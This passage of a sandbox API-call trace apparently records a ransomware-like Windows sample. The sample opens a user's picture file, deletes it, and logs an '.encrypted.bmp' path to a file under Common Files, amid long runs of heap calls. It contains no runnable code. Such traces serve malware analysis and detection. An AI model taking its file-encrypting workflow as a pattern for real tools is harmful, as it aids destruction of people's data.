lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0040.991] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0040.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.991] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.991] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.992] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\9repn4ayx.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0040.993] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0040.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0040.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0040.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0040.994] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.994] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.994] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.994] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.994] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.994] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.995] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.995] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", lpFilePart=0x0) returned 0x41 [0040.995] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eea17e0, ftCreationTime.dwHighDateTime=0x1d5b6c3, ftLastAccessTime.dwLowDateTime=0xa7b7e2d0, ftLastAccessTime.dwHighDateTime=0x1d5b90c, ftLastWriteTime.dwLowDateTime=0x1824a200, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1010e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="9REPn4aYX.bmp", cAlternateFileName="9REPN4~1.BMP")) returned 0x7c2240 [0040.995] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\xmqr1i0\\9repn4ayx.bmp")) returned 1 [0040.997] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eea17e0, ftCreationTime.dwHighDateTime=0x1d5b6c3, ftLastAccessTime.dwLowDateTime=0xa7b7e2d0, ftLastAccessTime.dwHighDateTime=0x1d5b90c, ftLastWriteTime.dwLowDateTime=0x1824a200, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1010e, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="9REPn4aYX.bmp", cAlternateFileName="9REPN4~1.BMP")) returned 0 [0040.997] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.997] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.997] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.997] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.997] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.997] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0040.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.998] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.998] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.998] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.998] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0040.998] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0040.998] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0040.999] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0040.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.999] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0040.999] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.999] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2fbe, lpOverlapped=0x0) returned 1 [0041.000] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.000] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2fbe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.000] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0041.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.encrypted.bmp\r\n", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0041.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f3630 [0041.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.encrypted.bmp\r\n", cchWideChar=78, lpMultiByteStr=0x7f3630, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\xmQr1I0\\9REPn4aYX.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 78 [0041.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.000] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0041.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.000] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4d, lpOverlapped=0x0) returned 1 [0041.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0041.000] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0041.000] CloseHandle (hObject=0x128) returned 1 [0041.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.001] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.003] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.003] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.003] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.004] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.004] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.004] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.004] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.004] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.005] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889aa8 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.005] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0041.005] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.005] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.006] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.006] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0041.006] RtlAllocateHeap 